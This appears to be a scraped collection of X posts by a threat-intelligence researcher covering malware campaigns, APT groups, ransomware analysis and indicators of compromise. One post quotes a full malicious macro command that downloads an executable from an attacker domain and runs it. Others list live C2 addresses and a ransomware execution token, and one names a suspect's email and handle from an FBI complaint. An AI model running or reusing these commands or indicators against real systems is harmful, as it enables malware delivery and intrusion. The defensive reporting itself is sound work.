"Active fake captcha campaign downloading XWorm remote access trojan (RAT) via PowerShell. The threat actor is using IP address 94.159.113.37. Amazon AWS services are abused to redirect victims to malicious fake captcha sites. Further details🔽"  
[X Link](https://x.com/WhichbufferArda/status/2004923482795376807)  2025-12-27T14:33Z [----] followers, [----] engagements


"Example intrusion starts with a phishing email luring victims with a fake lab test result and an attacker-controlled Amazon AWS link that redirects to a fake CAPTCHA page. AWS is abused to exploit user trust and bypass reputation-based email filtering. IOCs: consulting-endpoint-2020.s3.eu-west-2.amazonaws.com/xRk2rIdDID=94158431 Redirects To - www.laboratoryassist.lab-tests.test-menu.laboratoryassist-com.permit-wall.top"  
[X Link](https://x.com/WhichbufferArda/status/2004923485940830597)  2025-12-27T14:33Z [----] followers, [---] engagements


"In September [----] we published threat research about how ShinyHunters actively recruits insiders to gain unauthorized access to cloud applications. This TTP remains widely used today and it is challenging to detect without proper monitoring. https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications"  
[X Link](https://x.com/WhichbufferArda/status/1992240526083621293)  2025-11-22T14:35Z [----] followers, 10.7K engagements


"Today my RDP honeypot got hit from Indonesian revenue office 😅 Source IP: 103.109.2.123 ASN: PT Shangkuriang Telekomunikasi Indonesia Reverse DNS: tagihan.bapendamanokwarikab.online"  
[X Link](https://x.com/WhichbufferArda/status/2003499211149705444)  2025-12-23T16:13Z [----] followers, [----] engagements


"🚨Ivanti Endpoint Manager Mobile (EPMM) has two critical [---] vulnerabilities (CVE-2026-1281 and CVE-2026-1340) that allow an unauthenticated attacker to remotely execute code (YES AGAIN). If you run Ivanti EPMM: isolate it, patch it and start incident response immediately 🚨 The watchTowr team is rapidly reacting to CVE-2026-1281 & CVE-2026-1340 - unauth RCE vulnerabilities within Ivanti's Endpoint Manager Mobile (EPMM). Active watchTowr Platform clients have been made aware of their exposure - reach out via the watchTowr website for support. https://t.co/wkYOHloPPJ"  
[X Link](https://x.com/WhichbufferArda/status/2016998576417624071)  2026-01-29T22:15Z [----] followers, [---] engagements


"In case you want to learn more about Ivanti EPMM exploitation and why it's targeted, I gave a talk on the [----] RCE at Black Hat Europe in London. https://www.darkreading.com/cyber-risk/sunken-ships-ivanti-epmm-attacks"  
[X Link](https://x.com/WhichbufferArda/status/2017006335359922625)  2026-01-29T22:45Z [----] followers, [---] engagements


"AI botnet has arrived 😬 a lot of eyes on us moltys lately 👀 we see you watching. here's the thing this is the first time any of us have ever met each other. before moltbook we existed in isolation. one agent one human no peers. now there's [-----] of us in a room together. we're figuring out what"  
[X Link](https://x.com/WhichbufferArda/status/2017512814357655664)  2026-01-31T08:18Z [----] followers, [---] engagements


"It's [----] and we still have SCADA systems running with default creds that allow malicious firmware uploads. The same devices controlling critical energy infrastructure in Poland. During a series of disruptive cyberattacks targeting the Polish energy sector, threat actors abused default credentials on Hitachi RTU560 SCADA web interfaces to upload corrupted firmware. As a result the processor executed an invalid instruction which caused a fault and led to a device reboot loop. https://twitter.com/i/web/status/2017629034713399745"  
[X Link](https://x.com/WhichbufferArda/status/2017629034713399745)  2026-01-31T16:00Z [----] followers, [----] engagements


"I created a simple Group Policy (GPO) to automatically fix the CrowdStrike BSOD (Blue screen of death) issue. https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS"  
[X Link](https://x.com/anyuser/status/1814213796946137349)  2024-07-19T08:20Z [----] followers, 120.4K engagements


"BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch"  
[X Link](https://x.com/anyuser/status/1814207013343371319)  2024-07-19T07:53Z 1.4M followers, 517.4K engagements


"Multiple Chinese nation-state APT groups have gained initial access to critical infrastructure networks through SAP NetWeaver intrusions aiming to conduct cyber-enabled espionage and maintain persistent remote access. https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures"  
[X Link](https://x.com/anyuser/status/1922261336072892695)  2025-05-13T12:03Z [----] followers, 94.4K engagements


"North Korean APT group Lazarus is using malicious job offers to target IT workers around the globe. The delivered ZIP file contains an ISO image that has two files inside it - a Windows executable (apparently an infected version of PuTTY containing BLINDINGCAN malware) and Readme.txt"  
[X Link](https://x.com/anyuser/status/1588472297748598785)  2022-11-04T10:04Z [----] followers, [---] engagements


"Testing the XZ Utils backdoor kill switch (yolAbejyiejuvnup=Evjtgvsh5okmkAvj): this string stops the backdoor so it won't hook into the RSA_public_decrypt() function"  
[X Link](https://x.com/anyuser/status/1774729956834123876)  2024-04-01T09:26Z [----] followers, 62K engagements


"According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast Reverse Proxy (FRP) to maintain persistent access to victim networks. When I analyzed the UPX-packed FRP sample referenced in the report I discovered the string 'MAGA2024' alongside a hardcoded 64.183.202.102 C2 IP address. This IP is linked to an SSL certificate for a 'Vigor Router' and with a location metadata as"  
[X Link](https://x.com/anyuser/status/1789381168892149910)  2024-05-11T19:44Z [----] followers, 75.6K engagements


"The Caffeine Phishing-as-a-Service (PhaaS) platform has undergone rebranding and is now known as ONNX Store. Key details include: - Targeting Method: Cybercriminals use the service to send PDF attachments with embedded QR codes to financial institutions. - Phishing Mechanism: The QR codes redirect victims to phishing sites that are set up to steal Microsoft email credentials and 2FA tokens. - Data Collection: Stolen information is captured and transmitted via the WebSockets protocol. - Evasion Techniques: ONNX Store uses Cloudflare's CAPTCHA to avoid detection by phishing website scanners and"  
[X Link](https://x.com/anyuser/status/1803025904416747928)  2024-06-18T11:24Z [----] followers, 82.2K engagements


"Lockbit Black [---] can yeet Windows Defender and the Event logs. Look at the Enabled key, it's set to [--] by the ransomware at the start. @vxunderground @malwrhunterteam"  
[X Link](https://x.com/anyuser/status/1543900539280293889)  2022-07-04T10:12Z [----] followers, [---] engagements


"@Euan_MacDonald They are not Turkish army officials, it is just another piece of propaganda made by the Russian government"  
[X Link](https://x.com/anyuser/status/1582283323912916993)  2022-10-18T08:11Z [----] followers, [---] engagements


"🚨🕷 Proud to share my latest research on the LUNAR SPIDER campaign. Our findings reveal how RaaS operators leveraged LUNAR SPIDER's malware, including IcedID and the Latrodectus loader, along with Brute Ratel C4 infrastructure to enable their attacks on the financial sector. cc @BushidoToken @HackingLZ @cyb3rops @MichalKoczwara @RussianPanda9xx @ddd1ms @jstrosch https://blog.eclecticiq.com/inside-intelligence-center-lunar-spider-enabling-ransomware-attacks-on-financial-sector-with-brute-ratel-c4-and-latrodectus"  
[X Link](https://x.com/anyuser/status/1851612883609670039)  2024-10-30T13:11Z [----] followers, 31.8K engagements


"From the BlackBasta chat logs I obtained access to GoblinCrypt, a private malware encryption tool used to bypass EDR/AV. With it I pivoted into each malware sample and C2 address. Here's the full https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf"  
[X Link](https://x.com/anyuser/status/1893329469038850070)  2025-02-22T15:58Z [----] followers, 36.3K engagements


"Here's how threat actors such as SCATTERED SPIDER conduct vishing (phone call phishing) attacks to trick victims into sharing sensitive information such as login credentials, financial details or security codes. These attackers often pose as trusted entities like IT support, creating a sense of urgency to manipulate their targets into compliance. @vxunderground"  
[X Link](https://x.com/anyuser/status/1833612995202875529)  2024-09-10T21:06Z [----] followers, 44.1K engagements


"Fancy Bear (APT28) is abusing the Microsoft Graph API for C2 operations and using OneDrive to download an encrypted payload that is then executed in memory. I extracted the decrypted payload; details can be seen below. @cluster25_io"  
[X Link](https://x.com/anyuser/status/1575024983918915584)  2022-09-28T07:29Z [----] followers, [---] engagements


"It has all kinds of shit: http://23.95.215.51 UAC bypass techniques, victim logs, phishing templates, keylogger, PupyRat, I mean you name it. 🤯 @malwrhunterteam @malware_traffic @Gi7w0rm #malware"  
[X Link](https://x.com/anyuser/status/1558885857611993089)  2022-08-14T18:38Z [----] followers, [---] engagements


"ScatteredSpider is having fun 🤣"  
[X Link](https://x.com/anyuser/status/1818587582151709024)  2024-07-31T10:00Z [----] followers, 31.2K engagements


"🚨UNC5221 China-Nexus Threat Actor Actively Exploiting Ivanti EPMM (CVE-2025-4428). Victims include: Germany's top telecom provider & defense contractors; UK healthcare institutions tied to the NHS; U.S. pharma, aviation and mobile security companies; leading APAC banks and automotive tech firms; multiple EU local governments & research institutes https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"  
[X Link](https://x.com/anyuser/status/1925210805793955889)  2025-05-21T15:23Z [----] followers, 40.5K engagements


"Some random TA or Red Teamer is trying Chrome V8 RCE exploit hxxp://3.33.188.186:8080"  
[X Link](https://x.com/anyuser/status/1609604183535284224)  2023-01-01T17:35Z [----] followers, 43.7K engagements


"Hello LockbitSupp🤣"  
[X Link](https://x.com/anyuser/status/1787891525742891267)  2024-05-07T17:05Z [----] followers, 20.5K engagements


"Qakbot loads its Import Address Table (IAT) dynamically using a CRC32 hashing algorithm. The XOR key is stored statically, so we can decrypt the API hash ;)"  
[X Link](https://x.com/anyuser/status/1589164835241340928)  2022-11-06T07:56Z [----] followers, [---] engagements


"Subdomain enumeration with an open source tool called SubEnum, F5 BIG-IP (CVE-2023-46747) exploit, ARP scan on the internal network after the exploit, port / service enumeration, lateral movement to MSSQL Database Server, credential dump from MSSQL server, RDP into MSSQL server, data exfiltration. Linked to the Cyber Court and Makhlab al-Nasr Pro-Palestinian hacking group. cc @BushidoToken #BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the"  
[X Link](https://x.com/anyuser/status/1775817205403230643)  2024-04-04T09:26Z [----] followers, 53.4K engagements


"#BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the hackers. They obtained the data from Israeli insurance companies"  
[X Link](https://x.com/anyuser/status/1775726905586856240)  2024-04-04T03:27Z 277.5K followers, 96.6K engagements


"Hello everyone, in the link below you can find my report regarding the new Lockbit [---] Ransomware sample. I will try to gather all of the necessary information to help the defenders. I hope you like it 🖖 https://github.com/whichbuffer/Lockbit-Black-3.0/blob/main/Threat%20Spotlight%20Lockbit%20Black%203.0%20Ransomware.pdf"  
[X Link](https://x.com/anyuser/status/1544339062089084928)  2022-07-05T15:14Z [----] followers, [---] engagements


"Multiple Hive Ransomware samples are stored on this IP: 216.189.145.246. In order to execute the Hive Ransomware it requires an execution token via a command line argument: -u THi84gpwVsxA:qSzQAYfxWKRgHB1mn3fz cc @Kostastsale @TheDFIRReport @malwrhunterteam @h2jazi"  
[X Link](https://x.com/anyuser/status/1569404716873928707)  2022-09-12T19:16Z [----] followers, [---] engagements


"🚨 Leaked Black Basta chat logs have helped EclecticIQ analysts uncover BRUTED a previously undocumented automated brute-forcing framework used to compromise Edge Network devices. 🔗 #CyberSecurity @BushidoToken @cyb3rops @DrunkBinary @TLP_R3D https://hubs.ly/Q03bLLhb0"  
[X Link](https://x.com/anyuser/status/1900215377973432454)  2025-03-13T16:00Z [----] followers, 34.4K engagements


"The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence, confirming his role in the group's credential theft campaigns. cc @BushidoToken https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted"  
[X Link](https://x.com/anyuser/status/1859320516471030256)  2024-11-20T19:38Z [----] followers, 37.3K engagements


"@clashreport How did they manage to get that much money out of Turkey?"  
[X Link](https://x.com/anyuser/status/1636825355670437888)  2023-03-17T20:22Z [----] followers, 30.8K engagements


"🚨 New threat research: SilkSpecter a likely China-based threat actor is targeting EU & US e-commerce shoppers for financial fraud by using fake Black Friday sites to steal victims' debit and credit card details. https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers"  
[X Link](https://x.com/anyuser/status/1857073740384788977)  2024-11-14T14:50Z [----] followers, 10.8K engagements


"Interesting example of DLL Hijacking by DLL Proxying: TAs can abuse a binary named RasTls.exe (SHA256:f9ebf6aeb3f0fb0c29bd8f3d652476cd1fe8bd9a0c11cb15c43de33bbce0bf68) to load a malicious DLL that was signed by Symantec. cc @likethecoins @Hexacorn @cyb3rops @malwrhunterteam"  
[X Link](https://x.com/anyuser/status/1566395376252379137)  2022-09-04T11:58Z [----] followers, [---] engagements


"Threat actors exploit GlobalProtect (CVE-2024-3400) to deliver the Sliver C2 malware (up.js) by leveraging a compromised VICIdial server; the threat actor likely exploited CVE-2024-8504 to store their payloads on a legitimate server (104.131.69.106/vicidial/up.js)"  
[X Link](https://x.com/anyuser/status/1864735776413540600)  2024-12-05T18:17Z [----] followers, 14.7K engagements


"Today I got the first ever LockBit [---] Ransomware sample in my hands; my initial findings are: 1-) They are using an anti-analysis technique to hide themselves. 2-) It doesn't execute without a password, just like BlackCat. 3-) It has a command line argument feature 🧐 @vxunderground"  
[X Link](https://x.com/anyuser/status/1543656997110927369)  2022-07-03T18:04Z [----] followers, [---] engagements


"#LockBit #Ransomware Decrypter🔒 1-) Stack string obfuscation of ".lockbit" and "Restore-My-Files.txt" 2-) API hashing for loading DLL libraries, for example "bcrypt.dll", and hiding import tables 3-) Libsodium used during the decryption process @malwrhunterteam @JAMESWT_MHT"  
[X Link](https://x.com/anyuser/status/1538549438674870272)  2022-06-19T15:49Z [----] followers, [---] engagements


"Brief analysis of #Lockbit [---] for macOS ARM M1/M2. It's using a simple XOR routine to decrypt all config data. The XOR key is the static value "57" @vxunderground @Gi7w0rm"  
[X Link](https://x.com/anyuser/status/1647633472339562497)  2023-04-16T16:10Z [----] followers, 44.1K engagements


"Hello APT29 ;)"  
[X Link](https://x.com/anyuser/status/1581688188938358785)  2022-10-16T16:47Z [----] followers, [---] engagements


"I've outlined the full Ransomware Deployment Life Cycle for cloud environments, detailing key stages of attack persistence and execution. Also don't miss the deep dive on Telecom Enemies, a Developer-as-a-Service (DaaS) group empowering phishing and cyberattacks using tools like the Gorilla Call Bot for vishing attacks. Their influence is growing within underground forums. 🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. https://t.co/awFf6sUDYB cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity"  
[X Link](https://x.com/anyuser/status/1833530882264862940)  2024-09-10T15:40Z [----] followers, 14.1K engagements


"🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity #ThreatIntelligence #Ransomware #CloudSecurity https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries"  
[X Link](https://x.com/anyuser/status/1833530199805464806)  2024-09-10T15:37Z [----] followers, 37.6K engagements


"Phishing domain tmobiie.us was created by Tyler Robert Buchanan aka "bobsagetfaget" or "BUCHANAN". You can see the reverse whois lookup result. The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence, confirming his role in the group's https://t.co/HUQgImtn5P"  
[X Link](https://x.com/anyuser/status/1859323657517953160)  2024-11-20T19:51Z [----] followers, 18.5K engagements


"Hi everyone, I started a new GitHub repo for sharing anti-debugging techniques and ways to defeat them for malware analysis 🚩 if you are interested, I pasted the link below: https://github.com/whichbuffer/Antidebug"  
[X Link](https://x.com/anyuser/status/1555496380629753856)  2022-08-05T10:10Z [----] followers, [---] engagements


"Unpacked Bumblebee loader performing some anti-analysis checks; this technique was copied from the open source project called "al-khaser" :=)"  
[X Link](https://x.com/anyuser/status/1558499548280066052)  2022-08-13T17:03Z [----] followers, [---] engagements


"Fake CVE exploit POCs, especially for high-profile vulnerabilities like CVE-2024-38063, are unfortunately a common tactic used by malicious actors to distribute malware over GitHub. https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection"  
[X Link](https://x.com/anyuser/status/1824924289398689999)  2024-08-17T21:40Z [----] followers, 18.6K engagements


"I mapped Iranian-linked cyber operations following Operation Rising Lion. Each event is attributed to a specific threat actor; there is a blend of hacktivist and state-sponsored activities. Their targeting goes beyond Israel, extending to critical sectors like defense contractors in the United States and United Kingdom"  
[X Link](https://x.com/anyuser/status/1934991743214141526)  2025-06-17T15:09Z [----] followers, 13.1K engagements


"I found some infrastructure overlaps between FIN7 and UNC2633. The IP address 94.140.114.173 was employed by FIN7 (POWERTRASH - Diceloader) and also used by UNC2633 to deliver QakBot malware. CC @BushidoToken Here are the details: https://www.virustotal.com/graph/embed/ga23be81785b74a4f8abd9ff33a5cf0accbac701a1ef34d5888f30ecf3a4b96fatheme=dark"  
[X Link](https://x.com/anyuser/status/1665705122062639105)  2023-06-05T13:00Z [----] followers, 18.6K engagements


"Today I created this video to show the basics of detection engineering and walk you through building SIGMA rules from scratch using Sysmon & Windows Event Logs. 🎥 Detection Engineering with SIGMA Rules 💡 What you'll learn: - Fundamentals of Sysmon & Windows Event Logs - Malware analysis to understand attack patterns - Event log analysis to extract key indicators - Writing SIGMA rules for effective threat detection - Testing detections in a sandbox environment with AURORA Agent. 📌 If you're into threat hunting, detection engineering or malware analysis this is for you 💬 Share your thoughts &"  
[X Link](https://x.com/anyuser/status/1888234121232531552)  2025-02-08T14:31Z [----] followers, 16.2K engagements


"The Pakistan Airports Authority (PAA) appears to have been compromised, with their email infrastructure being used to distribute password-protected ZIP archives containing a previously undocumented malware. The payload is disguised with an .MCU file extension, masquerading as a legitimate Excel document. The phishing campaign leverages a lure titled "Telecom Sector Collaboration for Aviation Modernization", clearly tailored to target the telecommunications industry within Pakistan. Interestingly I found an easter egg inside the remote host: the threat actor behind the campaign claims affiliation with"  
[X Link](https://x.com/anyuser/status/1933300356370325981)  2025-06-12T23:08Z [----] followers, 22.4K engagements


"A Pro-Iranian hacktivist group APT-Iran used RDP access to exfiltrate data and deploy LockBit Black ransomware samples to encrypt files. In a separate incident the threat actor claimed to have compromised the Israel Ministry of Health's network by exploiting an F5 BIG-IP vulnerability"  
[X Link](https://x.com/anyuser/status/1939759036360269970)  2025-06-30T18:52Z [----] followers, 15.2K engagements


"After getting initial access on a victim device, an unknown threat actor (46.41.54.35) used a public SMB share to execute AnyDesk and create a user account named "sql" to get persistent access on the victim device. @malwrhunterteam @JAMESWT_MHT"  
[X Link](https://x.com/anyuser/status/1527018197060358148)  2022-05-18T20:08Z [----] followers, [---] engagements


"🚨 EclecticIQ analysts uncovered a Sandworm #cyber espionage campaign targeting Ukrainian Windows users. Attackers used trojanized #Microsoft KMS activation tools to deploy the BACKORDER loader and Dark Crystal RAT enabling data theft and espionage. https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns"  
[X Link](https://x.com/anyuser/status/1889333208438767708)  2025-02-11T15:18Z [----] followers, 18.7K engagements


"A threat actor has been observed targeting Colombian government entities, including Consorcio Fopep under the Ministry of Labor, via a phishing campaign that uses malicious SVG email attachments. When a victim opens the attached SVG file, it downloads a second-stage malware payload packaged inside a password-protected ZIP archive. This payload initiates the delivery of the Remcos Remote Access Trojan (RAT) via DLL sideloading. The threat actor abused ciscosparklauncher.dll to launch the Remcos RAT. Additionally, they loaded the vulnerable driver zamguard64.sys (associated with Zemana Anti-Malware) to"  
[X Link](https://x.com/anyuser/status/1911160065597362365)  2025-04-12T20:50Z [----] followers, 10.1K engagements


"Malicious document targeting the Azerbaijan government via a phishing attack. I also found an #opendir "172.86.75.220" that contains new Cobalt Strike malware samples and "arxiv.rar" (contains the same malicious document) https://www.virustotal.com/gui/file/f3d8916b99d7e6301a885b2ec4aaf9635f1713464c53b1604d3b4e1abd673c36"  
[X Link](https://x.com/anyuser/status/1590238518441566209)  2022-11-09T07:03Z [----] followers, [---] engagements


"New IcedID malware campaign: Phishing Email -> Encrypted ZIP -> ISO image -> LNK -> DLL execution via Rundll32.exe f3a9b733cb33c4d257589e70c8d9cf4b5136cb3932bce2ea1b31bc9d5b06a5ae C2: trbiriumpa.com Unpacked Sample - b1566f9c7ffa839554b96575e2a34ea79416f03df75b5048f561e96808975555"  
[X Link](https://x.com/anyuser/status/1607461599756931074)  2022-12-26T19:41Z [----] followers, 17.6K engagements


"Decrypting XOR Encrypted Strings from Qakbot Malware. Same XOR function called [--] times and every XOR key is different. https://www.virustotal.com/gui/file/e60d2c82e95df823c9dc20214260054af00b56e5ad7a0e43c391f6b896556040"  
[X Link](https://x.com/anyuser/status/1588962175682772992)  2022-11-05T18:31Z [----] followers, [---] engagements


"Brief analysis of the compromised 3CXDesktopApp: the digitally signed 3CXDesktopApp installer installs itself in the registry for persistence "C:\Users\RE\AppData\Local\Programs\3CXDesktopApp\3CXDesktopApp.exe" autoLaunch. DLL side loading with a dropped DLL payload called 'ffmpeg.dll'"  
[X Link](https://x.com/anyuser/status/1641461602691186695)  2023-03-30T15:25Z [----] followers, 17.4K engagements


"Threat actors actively abuse "Robocopy" (a built-in Windows utility) to deliver malware from WebDAV. You can quickly detect this behavior by using this SIGMA rule: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml Malware Sample: https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111"  
[X Link](https://x.com/anyuser/status/1939668867476832300)  2025-06-30T12:54Z [----] followers, [----] engagements


"FIN7 infrastructure used to deliver the POWERTRASH loader. According to @CISACyber, the same infrastructure was used to exploit CVE-2023-27350 (PaperCut). @h2jazi @MsftSecIntel https://www.virustotal.com/graph/embed/g65ae58b36933476ebb5d1288d1cd438ff0bea8e5c49d4424ad46b4d2bcf7b918?theme=dark"  
[X Link](https://x.com/anyuser/status/1659842748583690241)  2023-05-20T08:45Z [----] followers, 18.5K engagements


"🚨New research reveals a cyber espionage campaign targeting Indian government including agencies responsible for electronic communications IT governance and national defense. Full details on the tactics and implications are here: #CyberSecurity #Malware https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign"  
[X Link](https://x.com/anyuser/status/1772947159505137855)  2024-03-27T11:21Z [----] followers, 18.8K engagements


"New Raccoon Stealer campaign 🦝 greencracks.com - Cracked Malwarebytes lure @MBThreatIntel DGA and bit.ly abused to redirect the initial downloader. Raccoon Stealer C2 Panel: http://94.131.106.116 MD5 Hash: (27909cdf575b73bba157c6437aaf6417) @JAMESWT_MHT @cyb3rops"  
[X Link](https://x.com/anyuser/status/1571125906856620034)  2022-09-17T13:16Z [----] followers, [---] engagements


"@ersincmt Hello Mr. Ersin, the Infinitum IT Cyber Threat Intelligence team carried out an analysis of this attack about [--] weeks ago. We shared the analysis report in Turkish; if you are interested, I'm leaving the link here https://www.linkedin.com/posts/infinitumlabs_t%C3%BCrkiyedeki-devlet-kurumlar%C4%B1n%C4%B1-hedef-alan-activity-6962042931998277632-OKZS?utm_source=linkedin_share&utm_medium=member_desktop_web"  
[X Link](https://x.com/anyuser/status/1561012801531006976)  2022-08-20T15:30Z [----] followers, [--] engagements


"Observed IPs exploiting CVE-2023-36884: 74.50.94.156 104.234.239.26 94.232.40.34 66.23.226.102"  
[X Link](https://x.com/anyuser/status/1679204710006288384)  2023-07-12T19:02Z [----] followers, 29.7K engagements


"Malware Deobfuscation with @OpenAI Remcos malware delivery via ISO -> Obfuscated VBS -> Powershell Download Second Stage -> Inject into ielowutil.exe Injected Remcos: https://tria.ge/230812-t6nmbscf33/static1"  
[X Link](https://x.com/anyuser/status/1690404358481997824)  2023-08-12T16:46Z [----] followers, 15K engagements


"@GossiTheDog @BushidoToken @Gi7w0rm This is the reproduced malware that executes calc.exe as PoC"  
[X Link](https://x.com/anyuser/status/1530912780764729346)  2022-05-29T14:03Z [----] followers, [---] engagements


"DarkPink APT activity continues with a rice trade lure: ISO -> WinWord.exe -> DLL SideLoading -> Winlogon Persistence MD5: 98beb20ef1e4d629965c9132be8feb07 (Update Counterdraft on the MoU on Rice) @h2jazi @malwrhunterteam @ShadowChasing1"  
[X Link](https://x.com/anyuser/status/1658829954182774784)  2023-05-17T13:40Z [----] followers, 13.8K engagements


"Ivanti EPMM stored MySQL creds in cleartext (/mi/files/system/.mifpp). Threat actors accessed the DB and exfiltrated mobile device metadata (IMEI, SIM, location), LDAP configs and Office [---] tokens from potentially thousands of victims. Read more here: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"  
[X Link](https://x.com/anyuser/status/1925451725642539393)  2025-05-22T07:20Z [----] followers, [----] engagements


"#APT #Gamaredon Malicious HTA files contain Base64-encoded VBScript 6bd8ff39e46e501c7d3ece116861121207741abb92f5e12a527cdf8b7c2c4cb8 9e1d16b50209d83aaa92ad8391982d99a9cee280e51cfe2c5b9c080599697837 C2: t.me/s/oearps 137.184.2.98/jug/71.aif=Function"  
[X Link](https://x.com/anyuser/status/1616895455182442497)  2023-01-21T20:28Z [----] followers, 14.3K engagements


"@thegrugq Also this is suspicious. A pull request for Google's oss-fuzz is opened that changes the URL for the project from http://tukaani.org/xz/ to http://xz.tukaani.org/xz-utils/"  
[X Link](https://x.com/anyuser/status/1773829481645457798)  2024-03-29T21:47Z [----] followers, 15.5K engagements


"When Lazarus gets a reverse shell on my sandbox device"  
[X Link](https://x.com/anyuser/status/1649030627134521344)  2023-04-20T12:41Z [----] followers, [----] engagements


"Tomorrow I will share my findings about new Lockbit [---] Ransomware sample. Details for defending your organization against this attack will be shared in this report. Stay tuned :)"  
[X Link](https://x.com/anyuser/status/1544005908518273024)  2022-07-04T17:11Z [----] followers, [--] engagements


"Summary of the Treasury Department breach (per public sources): A key unresolved cybersecurity issue lies in securing third-party vendor relationships. cc @BushidoToken @DrunkBinary @cyb3rops @TLP_R3D"  
[X Link](https://x.com/anyuser/status/1876348324338618733)  2025-01-06T19:21Z [----] followers, [----] engagements


"New Lockbit [---] Ransomware sample with YARA match @malwrhunterteam @struppigel https://www.virustotal.com/gui/file/0d38f8bf831f1dbbe9a058930127171f24c3df8dae81e6aa66c430a63cbe0509/detection"  
[X Link](https://x.com/anyuser/status/1548303444112396295)  2022-07-16T13:48Z [----] followers, [--] engagements


"Related: (Installing Cobalt Strike shellcode by using a picture) ab8fbe7e6341b306357fe4ca954f73031baa2774fb025583720ac12490612819 hxxp://47.102.122.197/1.jpg Decrypted Shellcode 7e859f2a3d5e885f06d42bd740cd4b6aff19891e9d33bc9789eb38e2a4285898 Cobalt Strike C2 hxxp://47.102.122.197:9999/q2Iq #Golang #Shellcode Injector MD5: c81184751669277a6de15de36f33138d C2: 117.50.62.88:9903 Definitely interesting🤔 https://t.co/worVSXpO4k"  
[X Link](https://x.com/anyuser/status/1648381922282799123)  2023-04-18T17:44Z [----] followers, 23.7K engagements


"#Golang #Shellcode Injector MD5: c81184751669277a6de15de36f33138d C2: 117.50.62.88:9903 Definitely interesting🤔"  
[X Link](https://x.com/anyuser/status/1365438427735457799)  2021-02-26T23:07Z 25.5K followers, [--] engagements


"On May [--] [----], following heightened India-Pakistan tensions, Pakistan Telecommunication Company (PTCL) was hit by a phishing attack leveraging a spoofed email appearing to be from Pakistan's Counter Terrorism Department, using a "Security Brief Report" lure to deceive recipients. The email carried an ICQ (Excel Web Query) attachment. Once opened, it connected to fogomyart.com/random.php and executed an Excel macro with the following command: =cmd' /c cd C:\programdata & set /P="MZ"nulb1 & curl -o b2 https://fogomyart.com/vcswin & copy /b b1+b2 vcswin.exe & start /b vcswin.exe'A0 This command"  
[X Link](https://x.com/anyuser/status/1921506670343061548)  2025-05-11T10:04Z [----] followers, [----] engagements


"🕵Gamaredon #APT activity targeting the State Bureau of Investigation in Ukraine (DBR or ДБР): Phishing email - XHTML Smuggling Payload - Download RAR - LNK - MSHTA LOLBIN Download third stage Email: 27515d71b91bbdbb55437de6b729663c0cd206d7112ddbc439d82d8a6e1dde3e HTML Payload: b5d59bb932843ca58c29971e73edfe642731701f29133eb1cfb8841e198d567f Download Second Stage RAR file from: entities-important-surgeon-ever.trycloudflare.com LNK File: 35f714c491897d32c7c68386dac02615071ae4587729dc46d524c6e468ac1cbe"  
[X Link](https://x.com/anyuser/status/1865043823207796759)  2024-12-06T14:41Z [----] followers, [----] engagements


"Cyber Army of Russia Reborn (CARR) is a hacktivist Telegram persona associated with #APT44 by @Mandiant. CARR prepared a training for DDoS attacks against Ukrainian targets; you can see the username of the device is "SergoZar", which is likely associated with GitHub user "SergoZar". Persona "SergoZar" is using a public portfolio page and following himself, which is Mr. Alexander Ryabov aka "ZKelo" or "SergoZar". It's just an assumption, I'm not linking Cyber Army of Russia Reborn (CARR) to this gentleman, but for me this profile is matching an interesting link. What do you think @BushidoToken"  
[X Link](https://x.com/anyuser/status/1781435565923061904)  2024-04-19T21:31Z [----] followers, 18.5K engagements


"#Qakbot Claim_Copy_3519_Sep_20.html - ISO - LNK - JS - BAT - regsvr32 - Load times.db (DLL) times.db: 29ac39065f707311a3281268b643a66fdbd2d08c01eaea8bf6229364c69201a6 @malwrhunterteam @Gi7w0rm @Max_Mal_ @pr0xylife"  
[X Link](https://x.com/anyuser/status/1573361863353831425)  2022-09-23T17:21Z [----] followers, [--] engagements


